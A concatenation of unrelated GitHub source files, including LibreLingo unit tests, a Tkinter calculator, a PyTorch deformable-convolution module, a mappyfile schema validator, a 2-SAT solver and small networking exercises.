patch('liblili2json.dictionary.define_word')\n def test_defines_every_word(self, define_word):\n define_word.return_value = fakes.fake_value()\n assert define_words_in_sentence(\n fakes.course1, \"foo bar\", True) == [define_word.return_value, define_word.return_value]\n\n\nclass TestDefineWord(TestCase):\n def test_definition_not_found(self):\n word = fakes.fake_value()\n assert define_word(fakes.course1, word, reverse=False) == {\n \"word\": word\n }\n\n def test_includes_definition(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = Course(\n **{\n **(fakes.course1._asdict()),\n \"dictionary\": [\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=reverse\n ),\n ]\n },\n )\n assert define_word(my_course, word, reverse=reverse) == {\n \"word\": word,\n \"definition\": meaning\n }\n\n def test_doesnt_include_definition_with_different_word(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = Course(\n **{\n **(fakes.course1._asdict()),\n \"dictionary\": [\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=reverse\n ),\n ]\n },\n )\n assert define_word(my_course, \"asd\", reverse=reverse) == {\n \"word\": \"asd\",\n }\n\n def test_doesnt_include_definition_with_different_reverse(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = fakes.customize(fakes.course1, dictionary=[\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=False\n ),\n ])\n assert define_word(my_course, word, reverse=reverse) == {\n \"word\": word,\n }\n\n def test_skips_non_matching_definitions(self):\n word = fakes.fake_value()\n meaning = fakes.fake_value()\n reverse = fakes.fake_value()\n my_course = fakes.customize(fakes.course1, dictionary=[\n DictionaryItem(\n word=None,\n definition=None,\n reverse=None\n ),\n DictionaryItem(\n word=word,\n definition=meaning,\n reverse=reverse\n ),\n ])\n assert define_word(my_course, word, reverse=reverse) == {\n \"word\": word,\n \"definition\": meaning\n }\n\n def test_skips_empty_definition(self):\n word = fakes.fake_value()\n my_course = fakes.customize(fakes.course1, dictionary=[\n DictionaryItem(\n word=word,\n definition=\"\",\n reverse=False\n ),\n ])\n assert define_word(my_course, word, reverse=False) == {\n \"word\": word,\n }\n\n\nclass TestGetDumbOpaqueId(TestCase):\n def test_word_only_first_meaning_matters_1(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.word1, in_source_language=[x])\n p2 = fakes.customize(fakes.word1, in_source_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_phrase_only_first_meaning_matters_1(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.phrase1, in_source_language=[x])\n p2 = fakes.customize(fakes.phrase1, in_source_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_word_only_first_meaning_matters_2(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.word1, in_target_language=[x])\n p2 = fakes.customize(fakes.word1, in_target_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_phrase_only_first_meaning_matters_2(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.phrase1, in_target_language=[x])\n p2 = fakes.customize(fakes.phrase1, in_target_language=[x, y])\n assert get_dumb_opaque_id(z, p1) == get_dumb_opaque_id(z, p2)\n\n def test_the_first_meaning_does_matter(self):\n x, y = \"foo\", \"bar\"\n z = str(fakes.fake_value())\n p1 = fakes.customize(fakes.phrase1, in_target_language=[x])\n p2 = fakes.customize(fakes.phrase1, in_target_language=[y])\n assert get_dumb_opaque_id(z, p1) != get_dumb_opaque_id(z, p2)\n\n\nclass TestGroupAndIdPhrase(TestCase):\n def setUp(self):\n self.groups = []\n self.ids = []\n challenges = get_phrase_challenges(fakes.phrase1, fakes.course1)\n for challenge in challenges:\n self.groups.append(challenge[\"group\"])\n self.ids.append(challenge[\"id\"])\n assert len(self.groups) > 1\n assert len(self.ids) > 1\n\n def test_group_is_the_same_in_each_challenge_type(self):\n assert len(set(self.groups)) == 1\n\n def test_id_is_different_in_each_challenge_type(self):\n assert len(set(self.ids)) == len(self.ids)\n\n\nclass TestGroupAndIdWord(TestCase):\n def setUp(self):\n self.groups = []\n self.ids = []\n challenges = get_word_challenges(fakes.word1, fakes.course1)\n for challenge in challenges:\n self.groups.append(challenge[\"group\"])\n self.ids.append(challenge[\"id\"])\n assert len(self.groups) > 1\n assert len(self.ids) > 1\n\n def test_group_is_the_same_in_each_challenge_type(self):\n assert len(set(self.groups)) == 1\n\n def test_id_is_different_in_each_challenge_type(self):\n assert len(set(self.ids)) == len(self.ids)\n","repo_name":"Magicianred/LibreLingo","sub_path":"workspaces/liblili2json/tests/test_liblili2json.py","file_name":"test_liblili2json.py","file_ext":"py","file_size_in_byte":23466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"26619834452","text":"from tkinter import *\r\n\r\n\r\nroot = Tk()\r\nmiFrame=Frame(root)\r\nmiFrame.config(bg=\"#9193CD\")\r\nmiFrame.pack()\r\n\r\noperacion=\"\"\r\nreset_pantalla=False\r\nresultado=0\r\n\r\n#--------------------\r\n\r\nnumeroPantalla=StringVar()\r\n\r\npantalla=Entry(miFrame,textvariable=numeroPantalla)\r\npantalla.grid(row=1, column=1, padx=10,pady=10,columnspan=4)\r\npantalla.config(fg=\"black\", justify=\"right\")\r\n\r\n#------------- pulsado numeros\r\n\r\ndef numeropulsado(num):\r\n global operacion\r\n global reset_pantalla\r\n\r\n if reset_pantalla!=False:\r\n numeroPantalla.set(num)\r\n reset_pantalla=False\r\n else:\r\n numeroPantalla.set(numeroPantalla.get() + num)\r\n\r\n\r\n#-------- SUMA --------------\r\ndef suma(num):\r\n global operacion\r\n global resultado\r\n global reset_pantalla\r\n\r\n resultado +=int(num)\r\n operacion=\"suma\"\r\n reset_pantalla=True\r\n numeroPantalla.set(resultado)\r\n\r\n\r\n#------- RESTA --------------\r\nnum1=0\r\ncontador_resta=0\r\ndef resta(num):\r\n global operacion\r\n global resultado\r\n global num1\r\n global contador_resta\r\n global reset_pantalla\r\n \r\n if contador_resta==0:\r\n num1=int(num)\r\n resultado=num1\r\n else:\r\n if contador_resta==1:\r\n resultado=num1-int(num)\r\n else:\r\n resultado=int(resultado)-int(num)\r\n numeroPantalla.set(resultado)\r\n resultado=numeroPantalla.get()\r\n contador_resta=contador_resta+1\r\n operacion=\"resta\"\r\n reset_pantalla=True\r\n \r\n\r\n#---------------- MULTIPLICACION -------------------\r\n\r\ncontador_multi=0\r\n\r\ndef multiplica(num):\r\n\r\n\tglobal operacion\r\n\tglobal resultado\r\n\tglobal num1\r\n\tglobal contador_multi\r\n\tglobal reset_pantalla\r\n\t\r\n\tif contador_multi==0:\r\n\t\tnum1=int(num)\r\n\t\tresultado=num1\r\n\r\n\telse:\r\n\r\n\t\tif contador_multi==1:\r\n\t\t\tresultado=num1*int(num)\r\n\r\n\t\telse:\r\n\t\t\tresultado=int(resultado)*int(num)\t\r\n\t\tnumeroPantalla.set(resultado)\t\t\r\n\t\tresultado=numeroPantalla.get()\r\n\r\n\tcontador_multi=contador_multi+1\r\n\toperacion=\"multiplicacion\"\r\n\treset_pantalla=True\r\n\r\n\r\n#-----------------DIVISION ---------------\r\n\r\ncontador_divi=0\r\n\r\ndef divide(num):\r\n\r\n\tglobal operacion\r\n\tglobal resultado\r\n\tglobal num1\r\n\tglobal contador_divi\r\n\tglobal reset_pantalla\r\n\tif contador_divi==0:\r\n\r\n\t\tnum1=float(num)\t\r\n\t\tresultado=num1\r\n\r\n\telse:\r\n\r\n\t\tif contador_divi==1:\r\n\t\t\tresultado=num1/float(num)\r\n\t\telse:\r\n\t\t\tresultado=float(resultado)/float(num)\r\n\r\n\t\tnumeroPantalla.set(resultado)\t\t\r\n\t\tresultado=numeroPantalla.get()\r\n\r\n\r\n\tcontador_divi=contador_divi+1\r\n\toperacion=\"division\"\r\n\treset_pantalla=True\r\n\r\n\r\n\r\n#-------- EL RESULTADO ---------\r\n\r\ndef el_resultado():\r\n\r\n\tglobal resultado\r\n\tglobal operacion\r\n\tglobal contador_resta\r\n\tglobal contador_multi\r\n\tglobal contador_divi\r\n\t\r\n\r\n\tif operacion==\"suma\":\r\n\t\tnumeroPantalla.set(resultado+int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\r\n\telif operacion==\"resta\":\r\n\t\tnumeroPantalla.set(int(resultado)-int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\t\tcontador_resta=0\r\n\r\n\telif operacion==\"multiplicacion\":\r\n\t\tnumeroPantalla.set(int(resultado)*int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\t\tcontador_multi=0\r\n\r\n\telif operacion==\"division\":\r\n\t\tnumeroPantalla.set(int(resultado)/int(numeroPantalla.get()))\r\n\t\tresultado=0\r\n\t\tcontador_divi=0\r\n\r\n\r\n\r\n\r\n#---------------------- PRIMER FILA DE BOTONES\r\n\r\nboton7=Button(miFrame, text=\"7\",width=3,command=lambda:numeropulsado(\"7\"))\r\nboton7.grid(row=2, column=1)\r\nboton8=Button(miFrame, text=\"8\",width=3,command=lambda:numeropulsado(\"8\"))\r\nboton8.grid(row=2, column=2)\r\nboton9=Button(miFrame, text=\"9\",width=3,command=lambda:numeropulsado(\"9\"))\r\nboton9.grid(row=2, column=3)\r\nbotonMulti=Button(miFrame, text=\"*\",width=3,command=lambda:multiplica(numeroPantalla.get()))\r\nbotonMulti.grid(row=2, column=4)\r\n\r\n#--------------------- SEGUNDA FILA DE BOTONES\r\n\r\nboton4=Button(miFrame, text=\"4\",width=3,command=lambda:numeropulsado(\"4\"))\r\nboton4.grid(row=3, column=1)\r\nboton5=Button(miFrame, text=\"5\",width=3,command=lambda:numeropulsado(\"5\"))\r\nboton5.grid(row=3, column=2)\r\nboton6=Button(miFrame, text=\"6\",width=3,command=lambda:numeropulsado(\"6\"))\r\nboton6.grid(row=3, column=3)\r\nbotonDiv=Button(miFrame, text=\"/\",width=3,command=lambda:divide(numeroPantalla.get()))\r\nbotonDiv.grid(row=3, column=4)\r\n\r\n\r\n#-------------------- TERCER FILA DE BOTONES\r\n\r\nboton3=Button(miFrame, text=\"1\",width=3,command=lambda:numeropulsado(\"1\"))\r\nboton3.grid(row=4, column=1)\r\nboton2=Button(miFrame, text=\"2\",width=3,command=lambda:numeropulsado(\"2\"))\r\nboton2.grid(row=4, column=2)\r\nboton1=Button(miFrame, text=\"3\",width=3,command=lambda:numeropulsado(\"3\"))\r\nboton1.grid(row=4, column=3)\r\nbotonResta=Button(miFrame, text=\"-\",width=3,command=lambda:resta(numeroPantalla.get()))\r\nbotonResta.grid(row=4, column=4)\r\n\r\n#-------------------- FILA FINAL !!\r\n\r\nbotonComa=Button(miFrame, text=\",\",width=3,command=lambda:numeropulsado(\",\"))\r\nbotonComa.grid(row=5, column=1)\r\nboton0=Button(miFrame, text=\"0\",width=3,command=lambda:numeropulsado(\"0\"))\r\nboton0.grid(row=5, column=2)\r\nbotonIgual=Button(miFrame, text=\"=\",width=3,command=lambda:el_resultado())\r\nbotonIgual.grid(row=5, column=3)\r\nbotonSumar=Button(miFrame, text=\"+\",width=3,command=lambda:suma(numeroPantalla.get()))\r\nbotonSumar.grid(row=5, column=4)\r\n\r\n#---------------------------------------------\r\n\r\nroot.mainloop()","repo_name":"LucasNLopez/CALCULADORA","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31799413236","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Function\nfrom torch.autograd.function import once_differentiable\nfrom torch.nn.modules.utils import _pair\n\nfrom . import deform_conv_cuda\n\nclass DeformConvFunction(Function): \n @staticmethod\n def forward(ctx,\n input,\n offset,\n weight,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n deformable_groups=1,\n im2col_step=64):\n if input is not None and input.dim() != 4:\n raise ValueError(\n \"Expected 4D tensor as input, got {}D tensor instead.\".format(\n input.dim()))\n ctx.stride = _pair(stride)\n ctx.padding = _pair(padding)\n ctx.dilation = _pair(dilation)\n ctx.groups = groups\n ctx.deformable_groups = deformable_groups\n ctx.im2col_step = im2col_step\n\n # support f16, from mmdetection mmcv \n # When pytorch version >= 1.6.0, amp is adopted for fp16 mode;\n # amp won't cast the type of model (float32), but \"offset\" is cast\n # to float16 by nn.Conv2d automatically, leading to the type\n # mismatch with input (when it is float32) or weight.\n # The flag for whether to use fp16 or amp is the type of \"offset\",\n # we cast weight and input to temporarily support fp16 and amp\n # whatever the pytorch version is.\n offset = offset.type_as(input)\n weight = weight.type_as(input)\n # input = input.type_as(offset)\n # weight = weight.type_as(input)\n\n ctx.save_for_backward(input, offset, weight)\n\n output = input.new_empty(\n DeformConvFunction._output_size(input, weight, ctx.padding,\n ctx.dilation, ctx.stride))\n\n ctx.bufs_ = [input.new_empty(0), input.new_empty(0)] # columns, ones\n\n if not input.is_cuda:\n raise NotImplementedError\n else:\n cur_im2col_step = min(ctx.im2col_step, input.shape[0])\n assert (input.shape[0] %\n cur_im2col_step) == 0, 'im2col step must divide batchsize'\n \n deform_conv_cuda.deform_conv_forward_cuda(\n input, weight, offset, output, ctx.bufs_[0], ctx.bufs_[1],\n weight.size(3), weight.size(2), ctx.stride[1], ctx.stride[0],\n ctx.padding[1], ctx.padding[0], ctx.dilation[1],\n ctx.dilation[0], ctx.groups, ctx.deformable_groups,\n cur_im2col_step)\n return output\n\n @staticmethod\n @once_differentiable\n def backward(ctx, grad_output):\n input, offset, weight = ctx.saved_tensors\n\n grad_input = grad_offset = grad_weight = None\n\n if not grad_output.is_cuda:\n raise NotImplementedError\n else:\n cur_im2col_step = min(ctx.im2col_step, input.shape[0])\n assert (input.shape[0] %\n cur_im2col_step) == 0, 'im2col step must divide batchsize'\n\n if ctx.needs_input_grad[0] or ctx.needs_input_grad[1]:\n grad_input = torch.zeros_like(input)\n grad_offset = torch.zeros_like(offset)\n deform_conv_cuda.deform_conv_backward_input_cuda(\n input, offset, grad_output, grad_input,\n grad_offset, weight, ctx.bufs_[0], weight.size(3),\n weight.size(2), ctx.stride[1], ctx.stride[0],\n ctx.padding[1], ctx.padding[0], ctx.dilation[1],\n ctx.dilation[0], ctx.groups, ctx.deformable_groups,\n cur_im2col_step)\n\n if ctx.needs_input_grad[2]:\n grad_weight = torch.zeros_like(weight)\n deform_conv_cuda.deform_conv_backward_parameters_cuda(\n input, offset, grad_output,\n grad_weight, ctx.bufs_[0], ctx.bufs_[1], weight.size(3),\n weight.size(2), ctx.stride[1], ctx.stride[0],\n ctx.padding[1], ctx.padding[0], ctx.dilation[1],\n ctx.dilation[0], ctx.groups, ctx.deformable_groups, 1,\n cur_im2col_step)\n\n return (grad_input, grad_offset, grad_weight, None, None, None, None,\n None)\n\n @staticmethod\n def _output_size(input, weight, padding, dilation, stride):\n channels = weight.size(0)\n output_size = (input.size(0), channels)\n for d in range(input.dim() - 2):\n in_size = input.size(d + 2)\n pad = padding[d]\n kernel = dilation[d] * (weight.size(d + 2) - 1) + 1\n stride_ = stride[d]\n output_size += ((in_size + (2 * pad) - kernel) // stride_ + 1, )\n \n \n if not all(map(lambda s: s > 0, output_size)):\n raise ValueError(\n \"convolution input is too small (output would be {})\".format(\n 'x'.join(map(str, output_size))))\n \n \n return output_size\n\n\ndeform_conv = DeformConvFunction.apply\n\n\ndef DeformConvFunction_output_size(input, weight, padding,\n dilation, stride):\n channels = weight.size(0)\n output_size = (input.size(0), channels)\n for d in range(input.dim() - 2):\n in_size = input.size(d + 2)\n pad = padding[d]\n kernel = dilation[d] * (weight.size(d + 2) - 1) + 1\n stride_ = stride[d]\n output_size += ((in_size + (2 * pad) - kernel) // stride_ + 1, )\n \n if not all(map(lambda s: s > 0, output_size)):\n raise ValueError(\n \"convolution input is too small (output would be {})\".format(\n 'x'.join(map(str, output_size))))\n \n return output_size\n\n# @torch.jit.script\ndef DeformConvFunction_forward(input,\n offset,\n weight,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n deformable_groups=1,\n im2col_step=64):\n \n if input is not None and input.dim() != 4:\n raise ValueError(\n \"Expected 4D tensor as input, got {}D tensor instead.\".format(\n input.dim()))\n \n \n # stride = _pair(stride)\n # padding = _pair(padding)\n # dilation = _pair(dilation)\n\n # support f16, from mmdetection mmcv \n # When pytorch version >= 1.6.0, amp is adopted for fp16 mode;\n # amp won't cast the type of model (float32), but \"offset\" is cast\n # to float16 by nn.Conv2d automatically, leading to the type\n # mismatch with input (when it is float32) or weight.\n # The flag for whether to use fp16 or amp is the type of \"offset\",\n # we cast weight and input to temporarily support fp16 and amp\n # whatever the pytorch version is.\n offset = offset.type_as(input)\n weight = weight.type_as(input)\n # input = input.type_as(offset)\n # weight = weight.type_as(input)\n\n output = input.new_empty(\n DeformConvFunction_output_size(input, weight, padding,\n dilation, stride))\n\n\n bufs_ = [input.new_empty(1), input.new_empty(1)] # columns, ones\n\n # if not input.is_cuda:\n # raise NotImplementedError\n # else:\n # cur_im2col_step = min(im2col_step, input.shape[0])\n # assert (input.shape[0] %\n # cur_im2col_step) == 0, 'im2col step must divide batchsize'\n \n # deform_conv_cuda.deform_conv_forward_cuda(\n # input, weight, offset, output, bufs_[0], bufs_[1],\n # weight.size(3), weight.size(2), stride[1], stride[0],\n # padding[1], padding[0], dilation[1],\n # dilation[0], groups, deformable_groups,\n # cur_im2col_step)\n \n \n \n cur_im2col_step = min(im2col_step, input.shape[0])\n assert (input.shape[0] %\n cur_im2col_step) == 0, 'im2col step must divide batchsize'\n\n deform_conv_cuda.deform_conv_forward_cuda(\n input, weight, offset, output, bufs_[0], bufs_[1],\n weight.size(3), weight.size(2), stride[1], stride[0],\n padding[1], padding[0], dilation[1],\n dilation[0], groups, deformable_groups,\n cur_im2col_step)\n\n # print(\"结束\")\n return output\n\n\n\nclass DeformConv(nn.Module):\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n deformable_groups=1,\n bias=False):\n super(DeformConv, self).__init__()\n\n assert not bias\n assert in_channels % groups == 0, \\\n 'in_channels {} cannot be divisible by groups {}'.format(\n in_channels, groups)\n assert out_channels % groups == 0, \\\n 'out_channels {} cannot be divisible by groups {}'.format(\n out_channels, groups)\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = _pair(kernel_size)\n self.stride = _pair(stride)\n self.padding = _pair(padding)\n self.dilation = _pair(dilation)\n self.groups = groups\n self.deformable_groups = deformable_groups\n\n self.weight = nn.Parameter(\n torch.Tensor(out_channels, in_channels // self.groups,\n *self.kernel_size))\n\n self.reset_parameters()\n\n def reset_parameters(self):\n n = self.in_channels\n for k in self.kernel_size:\n n *= k\n stdv = 1. / math.sqrt(n)\n self.weight.data.uniform_(-stdv, stdv)\n\n def forward(self, x, offset):\n # return deform_conv(x, offset, self.weight, self.stride, self.padding,\n # self.dilation, self.groups, self.deformable_groups)\n # To fix an assert error in deform_conv_cuda.cpp:128\n # input image is smaller than kernel\n input_pad = (\n x.size(2) < self.kernel_size[0] or x.size(3) < self.kernel_size[1])\n if input_pad:\n pad_h = max(self.kernel_size[0] - x.size(2), 0)\n pad_w = max(self.kernel_size[1] - x.size(3), 0)\n x = F.pad(x, (0, pad_w, 0, pad_h), 'constant', 0).contiguous()\n offset = F.pad(offset, (0, pad_w, 0, pad_h), 'constant',\n 0).contiguous()\n \n # out = deform_conv(x, offset, self.weight, self.stride, self.padding,\n # self.dilation, self.groups, self.deformable_groups)\n\n \n out = DeformConvFunction_forward(x, offset, self.weight, self.stride, self.padding,\n self.dilation, self.groups, self.deformable_groups)\n \n # out = x.new_empty(x.shape)\n\n if input_pad:\n out = out[:, :, :out.size(2) - pad_h, :out.size(3) -\n pad_w].contiguous()\n \n return out\n\n","repo_name":"chongkuiqi/FTRP_app","sub_path":"example/FTRP_software/models/dcn/deform_conv.py","file_name":"deform_conv.py","file_ext":"py","file_size_in_byte":11021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17512056669","text":"#!/usr/bin/python3\n# POST Request\nimport urllib.request as request\nimport urllib.parse as parse\nfrom sys import argv\n\n\nif __name__ == '__main__':\n url = argv[1]\n data = {\"email\": argv[2]}\n\n post = parse.urlencode(data).encode(\"utf-8\")\n req = request.Request(url, post)\n\n with request.urlopen(req) as response:\n print(response.read().decode(\"utf-8\"))\n","repo_name":"dantsub/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42567383812","text":"import json\nimport os\nimport sys\nfrom collections import OrderedDict\nimport logging\nimport jsonschema\nimport jsonref\nimport mappyfile as utils\n\nlog = logging.getLogger(\"mappyfile\")\n\nPY2 = sys.version_info[0] < 3\nif PY2:\n str = unicode # NOQA\n\n\nclass Validator(object):\n\n def __init__(self):\n self.schemas = {}\n self.expanded_schemas = {}\n\n def get_schema_path(self, schemas_folder):\n \"\"\"\n Return a file protocol URI e.g. file:///D:/mappyfile/mappyfile/schemas/ on Windows\n and file:////home/user/mappyfile/mappyfile/schemas/ on Linux\n \"\"\"\n\n # replace any Windows path back slashes with forward slashes\n schemas_folder = schemas_folder.replace(\"\\\\\", \"/\")\n\n # HACK Python 2.7 on Linux seems to remove the root slash\n # so add this back in\n if schemas_folder.startswith(\"/\"):\n schemas_folder = \"/\" + schemas_folder\n\n host = \"\"\n root_schema_path = \"file://{}/{}\".format(host, schemas_folder) + \"/\"\n\n return root_schema_path\n\n def get_schemas_folder(self):\n return os.path.join(os.path.dirname(os.path.realpath(__file__)), \"schemas\")\n\n def get_schema_file(self, schema_name):\n\n schema_name += \".json\"\n schemas_folder = self.get_schemas_folder()\n schema_file = os.path.join(schemas_folder, schema_name)\n\n if not os.path.isfile(schema_file):\n raise IOError(\"The file %s does not exist\" % schema_file)\n\n return schema_file\n\n def get_schema_validator(self, schema_name):\n \"\"\"\n Had to remove the id property from map.json or it uses URLs for validation\n See various issues at https://github.com/Julian/jsonschema/pull/306\n \"\"\"\n\n if schema_name not in self.schemas:\n schema_file = self.get_schema_file(schema_name)\n with open(schema_file) as f:\n try:\n jsn_schema = json.load(f)\n except ValueError as ex:\n log.error(\"Could not load %s\", schema_file)\n raise ex\n\n schemas_folder = self.get_schemas_folder()\n root_schema_path = self.get_schema_path(schemas_folder)\n resolver = jsonschema.RefResolver(root_schema_path, None)\n # cache the schema for future use\n self.schemas[schema_name] = (jsn_schema, resolver)\n else:\n jsn_schema, resolver = self.schemas[schema_name]\n\n validator = jsonschema.Draft4Validator(schema=jsn_schema, resolver=resolver)\n # validator.check_schema(jsn_schema) # check schema is valid\n\n return validator\n\n def convert_lowercase(self, x):\n\n if isinstance(x, list):\n return [self.convert_lowercase(v) for v in x]\n elif isinstance(x, dict):\n return OrderedDict((k.lower(), self.convert_lowercase(v)) for k, v in x.items())\n else:\n if isinstance(x, (str, bytes)):\n x = x.lower()\n\n return x\n\n def create_message(self, rootdict, path, error, add_comments):\n \"\"\"\n Add a validation comment to the dictionary\n path is the path to the error object, it can be empty if the error is in the root object\n http://python-jsonschema.readthedocs.io/en/latest/errors/#jsonschema.exceptions.ValidationError.absolute_path\n It can also reference an object in a list e.g. [u'layers', 0]\n \"\"\"\n\n if not path:\n # error applies to the root type\n d = rootdict\n key = d[\"__type__\"]\n elif isinstance(path[-1], int):\n # the error is on an object in a list\n d = utils.findkey(rootdict, *path)\n key = d[\"__type__\"]\n else:\n key = path[-1]\n d = utils.findkey(rootdict, *path[:-1])\n\n error_message = \"ERROR: Invalid value for {}\".format(key.upper())\n\n # add a comment to the dict structure\n\n if add_comments:\n if \"__comments__\" not in d:\n d[\"__comments__\"] = OrderedDict()\n\n d[\"__comments__\"][key] = \"# {}\".format(error_message)\n\n error_message = {\"error\": error.message,\n \"message\": error_message}\n\n # add in details of the error line, when Mapfile was parsed to\n # include position details\n\n if \"__position__\" in d:\n pd = d[\"__position__\"][key]\n error_message[\"line\"] = pd.get(\"line\")\n error_message[\"column\"] = pd.get(\"column\")\n\n return error_message\n\n def get_error_messages(self, d, errors, add_comments):\n\n error_messages = []\n\n for error in errors:\n pth = error.absolute_path\n pth = list(pth) # convert deque to list\n em = self.create_message(d, pth, error, add_comments)\n error_messages.append(em)\n\n return error_messages\n\n def _validate(self, d, validator, add_comments, schema_name):\n lowercase_dict = self.convert_lowercase(d)\n jsn = json.loads(json.dumps(lowercase_dict), object_pairs_hook=OrderedDict)\n\n errors = list(validator.iter_errors(jsn))\n error_messages = self.get_error_messages(d, errors, add_comments)\n\n return error_messages\n\n def validate(self, value, add_comments=False, schema_name=\"map\"):\n \"\"\"\n verbose - also return the jsonschema error details\n \"\"\"\n validator = self.get_schema_validator(schema_name)\n\n error_messages = []\n\n if isinstance(value, list):\n for d in value:\n error_messages += self._validate(d, validator, add_comments, schema_name)\n else:\n error_messages = self._validate(value, validator, add_comments, schema_name)\n\n return error_messages\n\n def get_expanded_schema(self, schema_name):\n \"\"\"\n Return a schema file with all $ref properties expanded\n \"\"\"\n if schema_name not in self.expanded_schemas:\n fn = self.get_schema_file(schema_name)\n schemas_folder = self.get_schemas_folder()\n base_uri = self.get_schema_path(schemas_folder)\n\n with open(fn) as f:\n jsn_schema = jsonref.load(f, base_uri=base_uri)\n\n # cache the schema for future use\n self.expanded_schemas[schema_name] = jsn_schema\n else:\n jsn_schema = self.expanded_schemas[schema_name]\n\n return jsn_schema\n","repo_name":"guardeivid/mappyfile","sub_path":"mappyfile/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"12012607333","text":"import sys\nfrom collections import defaultdict, deque\n\nsys.setrecursionlimit(10 ** 6)\n\ndef dfs(v):\n global counter\n counter += 1\n dfs_num[v] = dfs_low[v] = counter\n dfs_stack.append(v)\n visited[v] = True\n\n for u in graph[v]:\n if dfs_num[u] == 0:\n dfs(u)\n if visited[u]:\n dfs_low[v] = min(dfs_low[v], dfs_low[u])\n\n if dfs_num[v] == dfs_low[v]:\n component = []\n while True:\n u = dfs_stack.pop()\n visited[u] = False\n component.append(u)\n if u == v:\n break\n scc.append(component)\n\ndef is_satisfiable():\n for component in scc:\n for v in component:\n if -v in component:\n return False\n return True\n\ndef find_assignment():\n assignment = [None] * N\n for component in scc:\n for v in component:\n if assignment[abs(v) - 1] is None:\n assignment[abs(v) - 1] = 1 if v > 0 else 0\n return assignment\n\nN, M = map(int, input().split())\ngraph = defaultdict(list)\n\nfor _ in range(M):\n u, v = map(int, input().split())\n graph[-u].append(v)\n graph[-v].append(u)\n\ndfs_num = [0] * (2 * N + 1)\ndfs_low = [0] * (2 * N + 1)\nvisited = [False] * (2 * N + 1)\ndfs_stack = deque()\ncounter = 0\nscc = []\n\nfor v in range(1, 2 * N + 1):\n if dfs_num[v] == 0:\n dfs(v)\n\nif is_satisfiable():\n print(1)\n assignment = find_assignment()\n print(*assignment)\nelse:\n print(0)\n","repo_name":"dukjoon/baekjoon","sub_path":"solved/11281.py","file_name":"11281.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9133126252","text":"\"\"\"provides read/write config file functions\"\"\"\n\nfrom configparser import ConfigParser\nfrom configparser import NoSectionError, MissingSectionHeaderError\nimport sys\n\nfrom . import constants\n\n\ndef read(args):\n \"\"\"read config file\"\"\"\n config_file = args.config\n if not config_file:\n config_file = constants.path_config\n\n try:\n conf_parser = ConfigParser()\n conf_parser.read(config_file)\n defaults = constants.OrderedDict(\n conf_parser.items(constants.dflt_section))\n except (NoSectionError, MissingSectionHeaderError):\n if args.config:\n print('Cannot read config file! Run install script.')\n defaults = constants.OrderedDict()\n\n for opt, val in constants.default_config.items():\n if opt not in defaults:\n defaults[opt] = val\n\n if not str(defaults['width_tot']).isdigit():\n defaults['width_tot'] = constants.default_config['width_tot']\n\n return defaults\n\n\ndef write(args, out_stream):\n \"\"\"write config file\"\"\"\n config = ConfigParser()\n config.add_section(constants.dflt_section)\n for opt in constants.default_config:\n config.set(constants.dflt_section, opt, str(args[opt]).strip())\n\n if out_stream is sys.stdout:\n config.write(out_stream)\n else:\n with open(out_stream, 'w') as out_file:\n config.write(out_file)\n","repo_name":"WenchaoLin/qjobs","sub_path":"qjobs/configfile.py","file_name":"configfile.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"24841378559","text":"import socket\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserver.connect(('127.0.0.1',8088)) \n\ndata = server.recv(1024)\nprint(data.decode())\n\nserver.send(\"Ok received!\".encode())\n\nserver.close()","repo_name":"mmpcukp/RockPaperScissor_extended","sub_path":"networking/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31790824172","text":"import os\nimport sys\nimport math\nimport json\n# Standard Imports + Math Import\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n# Make File run form the high directory\n\nfrom 